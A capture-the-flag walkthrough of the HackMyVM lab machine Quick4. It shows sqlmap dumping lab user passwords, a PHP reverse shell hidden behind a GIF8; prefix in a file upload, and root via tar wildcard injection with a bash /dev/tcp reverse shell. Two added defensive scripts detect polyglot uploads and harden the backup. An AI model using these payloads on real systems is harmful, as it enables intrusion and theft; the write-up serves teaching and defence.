HackMyVM-Quick4
Information gathering
Host discovery
┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.2.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-15 03:19 EDT
Nmap scan report for quick4 (192.168.2.9)
Host is up (0.00028s latency).
MAC Address: 08:00:27:AA:84:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for kali (192.168.2.15)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 43.54 seconds

Port scanning
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- 192.168.2.9
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-15 03:21 EDT
Nmap scan report for quick4 (192.168.2.9)
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
MAC Address: 08:00:27:AA:84:13 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

Exploitation
Directory enumeration
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.2.9
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.9
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt,jpg,png,zip,git
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 276]
/images               (Status: 301) [Size: 311] [--> http://192.168.2.9/images/]
/index.html           (Status: 200) [Size: 51414]
/.html                (Status: 403) [Size: 276]
/img                  (Status: 301) [Size: 308] [--> http://192.168.2.9/img/]
/modules              (Status: 301) [Size: 312] [--> http://192.168.2.9/modules/]
/careers              (Status: 301) [Size: 312] [--> http://192.168.2.9/careers/]
/css                  (Status: 301) [Size: 308] [--> http://192.168.2.9/css/]
/lib                  (Status: 301) [Size: 308] [--> http://192.168.2.9/lib/]
/js                   (Status: 301) [Size: 307] [--> http://192.168.2.9/js/]
/customer             (Status: 301) [Size: 313] [--> http://192.168.2.9/customer/]
/404.html             (Status: 200) [Size: 5014]
/robots.txt           (Status: 200) [Size: 32]
/fonts                (Status: 301) [Size: 310] [--> http://192.168.2.9/fonts/]
/employee             (Status: 301) [Size: 313] [--> http://192.168.2.9/employee/]
/.php                 (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 276]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

Let's take a look at /robots.txt.
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.2.9/robots.txt
User-agent: *
Disallow: /admin/

/admin returns a 404; /employee gives a login page.
Let's try SQL injection
┌──(kali㉿kali)-[~]
└─$ sqlmap -r sql --batch --dbs
available databases [5]:
[*] `quick`
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

┌──(kali㉿kali)-[~]
└─$ sqlmap -r sql --batch -D quick --tables
Database: quick
[2 tables]
+-------+
| cars  |
| users |
+-------+

┌──(kali㉿kali)-[~]
└─$ sqlmap -r sql --batch -D quick -T cars --dump
Database: quick
Table: cars
[4 entries]
+----+---------+-------+---------+------+---------------+
| id | user_id | brand | type    | year | license_plate |
+----+---------+-------+---------+------+---------------+
| 1  | 4       | Ford  | Mustang | 1963 | ABC123        |
| 2  | 6       | Honda | Civic   | 2012 | DEF456        |
| 3  | 7       | Mazda | mx5     | 2004 | GHIJ56        |
| 4  | 8       | Dodge | RAM1000 | 2020 | KLM789        |
+----+---------+-------+---------+------+---------------+

┌──(kali㉿kali)-[~]
└─$ sqlmap -r sql -D quick -T users --columns --batch
Database: quick
Table: users
[6 columns]
+-----------------+-------------------------------------+
| Column          | Type                                |
+-----------------+-------------------------------------+
| name            | varchar(255)                        |
| role            | enum('admin','employee','customer') |
| email           | varchar(255)                        |
| id              | int                                 |
| password        | varchar(255)                        |
| profile_picture | varchar(255)                        |
+-----------------+-------------------------------------+

┌──(kali㉿kali)-[~]
└─$ sqlmap -r sql -D quick -T users -C email,password,role --dump --threads=10 --batch
Database: quick
Table: users
[28 entries]
+-----------------------------------+----------+--------------------+
| email                             | role     | password           |
+-----------------------------------+----------+--------------------+
| a.lucky@email.hmv                 | customer | c1P35bcdw0mF3ExJXG |
| andrew.speed@quick.hmv            | employee | o30VfVgts73ibSboUP |
| b.clintwood@email.hmv             | customer | 2yLw53N0m08OhFyBXx |
| coos.busters@quick.hmv            | employee | f1CD3u3XVo0uXumGah |
| d.trumpet@email.hmv               | customer | f64KBw7cGvu1BkVwcb |
| dick_swett@email.hmv              | customer | y6KA4378EbK0ePv5XN |
| frank@email.hmv                   | customer | 155HseB7sQzIpE2dIG |
| fred.flinstone@email.hmv          | customer | qM51130xeGHHxKZWqk |
| info@quick.hmv                    | admin    | Qe62W064sgRTdxAEpr |
| j.bond@email.hmv                  | customer | 7wS93MQPiVQUkqfQ5T |
| j.daniels@email.hmv               | customer | yF891teFhjhj0Rg7ds |
| j.doe@email.hmv                   | customer | 0i3a8KyWS2IcbmqF02 |
| jack.black@email.hmv              | customer | 1Wd35lRnAKMGMEwcsX |
| jane_smith@email.hmv              | customer | pL2a92Po2ykXytzX7y |
| jeff.anderson@quick.hmv           | employee | 5dX3g8hnKo7AFNHXTV |
| john.smith@quick.hmv              | employee | 5Wqio90BLd7i4oBMXJ |
| juan.mecanico@quick.hmv           | employee | 5a34pXYDAOUMZCoPrg |
| k.ball@email.hmv                  | customer | k1TI68MmYu8uQHhfS1 |
| lara.johnson@quick.hmv            | employee | 5Y7zypv8tl9N7TeCFp |
| laura.johnson@email.hmv           | customer | 95T3OmjOV3gublmR7Z |
| lee.ka-shingn@quick.hmv@quick.hmv | employee | am636X6Rh1u6S8WNr4 |
| m.monroe@email.hmv                | customer | f64KBw7cGvu1BkVwcb |
| mike.cooper@quick.hmv             | employee | Rh978db3URen64yaPP |
| misty.cupp@email.hmv              | customer | c1P35bcdw0mF3ExJXG |
| n.down@email.hmv                  | customer | Lj9Wr562vqNuLlkTr0 |
| nick.greenhorn@quick.hmv          | employee | C3ho049g4kwxTxuSUA |
| s.hutson@email.hmv                | customer | sF217VruHNj6wbjofU |
| t.green@email.hmv                 | customer | 7zQ19L0HhFsivH3zFi |
+-----------------------------------+----------+--------------------+

Using the admin-role account info@quick.hmv, I logged into the back end successfully and found that a profile picture can be uploaded.
Try uploading a reverse shell
<?php $sock=fsockopen("192.168.2.15",4444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>

After intercepting the request, prepend GIF8; so the file passes as an image.
GIF8; <?php $sock=fsockopen("192.168.2.15",4444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>

It ended up uploaded under the nick user, so we switch over to that user.
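The GIF8; prefix above is enough to satisfy a check that only inspects the first bytes, yet the PHP tags remain in the body, and an upload directory served by a PHP-enabled vhost will execute them. As an added example that is not part of the original writeup, the following POSIX shell code shows the check a defender can run over an upload directory to find such image/PHP polyglots (the directory path and the sample files are constructed for the demo):

```shell
#!/bin/sh
# Added example (not the machine's or the writeup's code): scan an upload
# directory for files that carry an image magic number but also contain a PHP
# open tag, i.e. the "GIF8;<?php ... ?>" disguise. Paths are assumptions.

# Return 0 if the file begins with a GIF, PNG or JPEG magic number.
# od prints the first four bytes as hex so binary data never hits the shell.
has_image_magic() {
    magic=$(od -An -tx1 -N4 -- "$1" | tr -d ' \n')
    case $magic in
        47494638*|89504e47*|ffd8ff*) return 0 ;;   # "GIF8", ".PNG", JPEG SOI
        *) return 1 ;;
    esac
}

# Print the path of every regular file under $1 that looks like an image by
# magic number but also carries "<?php" or "<?=" anywhere in its body.
# grep -a treats the binary image data as text so the tag search still works.
find_polyglot_uploads() {
    find "$1" -type f | while IFS= read -r f; do
        if has_image_magic "$f" && grep -q -a -e '<?php' -e '<?=' -- "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Demo on a constructed upload directory: one clean GIF header and one
# polyglot whose PHP body is only a comment.
demo_dir=$(mktemp -d)
printf 'GIF89a\001\000\001\000' > "$demo_dir/avatar_ok.gif"
printf 'GIF8;<?php /* marker */ ?>' > "$demo_dir/avatar_bad.gif"
echo "Flagged uploads:"
find_polyglot_uploads "$demo_dir"
rm -rf "$demo_dir"
```

Finding the file is the detection side; the fix on the application side is to decode and re-encode the uploaded image server-side, store it under a server-chosen name with a fixed extension, and keep the upload directory free of script execution (outside the web root, or with the PHP handler disabled for that path).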
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.15] from (UNKNOWN) [192.168.2.9] 49508
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@quick4:/var/www/html/employee/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@quick4:/var/www/html/employee/uploads$ sudo -l
sudo -l
[sudo] password for www-data:
www-data@quick4:/var/www/html/employee$ find / -perm -4000 -type f 2>/dev/null
<ml/employee$ find / -perm -4000 -type f 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/snapd/20671/usr/lib/snapd/snap-confine
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/snap/core20/2105/usr/bin/chfn
/snap/core20/2105/usr/bin/chsh
/snap/core20/2105/usr/bin/gpasswd
/snap/core20/2105/usr/bin/mount
/snap/core20/2105/usr/bin/newgrp
/snap/core20/2105/usr/bin/passwd
/snap/core20/2105/usr/bin/su
/snap/core20/2105/usr/bin/sudo
/snap/core20/2105/usr/bin/umount
/snap/core20/2105/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2105/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/fusermount3
/usr/bin/chfn
/usr/bin/mount
/usr/bin/su
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
www-data@quick4:/var/www/html/employee$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/snap/core20/1974/usr/bin/ping cap_net_raw=ep
/snap/core20/2105/usr/bin/ping cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep

// /usr/local/bin/backup.sh turns out to run once every minute
www-data@quick4:/var/www/html/employee$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
*/1 *   * * *   root    /usr/local/bin/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@quick4:/var/www/html/employee$ ls -la /usr/local/bin/backup.sh
ls -la /usr/local/bin/backup.sh
-rwxr--r-- 1 root root 75 Feb 12  2024 /usr/local/bin/backup.sh

// tar is invoked with a wildcard, so file names get parsed as tar arguments
www-data@quick4:/var/www/html/employee$ cat /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *
www-data@quick4:/var/www/html/employee$ cd /var/www/html/
cd /var/www/html/

// create the malicious files
www-data@quick4:/var/www/html$ touch -- "--checkpoint=1"
touch -- "--checkpoint=1"
www-data@quick4:/var/www/html$ touch -- "--checkpoint-action=exec=bash shell.sh"
<$ touch -- "--checkpoint-action=exec=bash shell.sh"

// write the reverse shell
www-data@quick4:/var/www/html$ echo "bash -i >& /dev/tcp/192.168.2.15/1234 0>&1" > shell.sh
<h -i >& /dev/tcp/192.168.2.15/1234 0>&1" > shell.sh
www-data@quick4:/var/www/html$ chmod +x shell.sh
chmod +x shell.sh

// when the job runs, the command becomes: tar czf ... --checkpoint=1 --checkpoint-action=exec=bash shell.sh *

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.2.15] from (UNKNOWN) [192.168.2.9] 33590
bash: cannot set terminal process group (61796): Inappropriate ioctl for device
bash: no job control in this shell
root@quick4:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
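The root cause of the escalation above is that the shell, not tar, expands `*`: every file name in /var/www/html lands on tar's command line, so anyone who can create a file there chooses tar's options. As an added example that is not the machine's backup.sh, the following POSIX shell code shows how the same job can be written so that file names never reach the option parser, together with a pre-flight check that reports any option-looking names (directory and archive paths are constructed for the demo):

```shell
#!/bin/sh
# Added example (not the writeup's or the machine's script): a wildcard-safe
# variant of the backup job plus a check for option-looking file names.
# All paths below are assumptions made for the demo.

# Print the names of entries directly under $1 that begin with '-'.
# With "tar czf out.tgz *" each such name would be parsed by tar as an option.
list_option_like_names() {
    for p in "$1"/-*; do
        [ -e "$p" ] || continue        # the glob matched nothing
        printf '%s\n' "${p##*/}"
    done
}

# Archive the contents of $1 into $2 without a glob: -C enters the directory
# and '.' names everything inside it, so member names are never command-line
# words; '--' ends option parsing before the operand for good measure.
safe_backup() {
    src=$1
    out=$2
    tar -C "$src" -czf "$out" -- .
}

# Demo: a constructed web root containing an option-looking file name, which
# the hardened job archives as an ordinary member.
demo_root=$(mktemp -d)
demo_out="$demo_root.tar.gz"
echo '<html></html>' > "$demo_root/index.html"
touch -- "$demo_root/--checkpoint=1"
echo "Option-like names found in $demo_root:"
list_option_like_names "$demo_root"
safe_backup "$demo_root" "$demo_out"
echo "Archive members:"
tar -tzf "$demo_out"
rm -rf "$demo_root" "$demo_out"
```

Fixing the glob removes the checkpoint trick, but the job still runs as root every minute over a directory that www-data can write to; running the backup as a dedicated unprivileged user that only has read access to the web root closes the second half of the problem.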